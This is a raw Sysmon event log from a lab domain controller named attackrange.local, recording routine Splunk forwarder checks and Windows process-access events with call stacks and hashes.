Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003768Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.558{59A5CD1D-8EE4-6005-C100-00000000A301}2872C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 2>&1C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003767Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.530{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003766Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.499{59A5CD1D-8EE4-6005-C000-00000000A301}4436172C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003765Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.264{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE4-6005-C000-00000000A301}4436C:\Program 
Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003764Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003763Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003762Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003761Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003760Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003759Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003758Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003757Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003756Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EE4-6005-C000-00000000A301}4436C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003755Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003754Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8EE4-6005-BF00-00000000A301}46682660C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{59A5CD1D-8EE4-6005-C000-00000000A301}4436C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003753Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.262{59A5CD1D-8EE4-6005-C000-00000000A301}4436C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk 
ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8EE4-6005-BF00-00000000A301}4668C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list kvstore --no-log 10341000x80000000000000003752Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE4-6005-BF00-00000000A301}4668C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003751Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000003750Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003749Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003748Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003747Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003746Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003745Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003744Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003743Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003742Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EE4-6005-BF00-00000000A301}4668C:\Program 
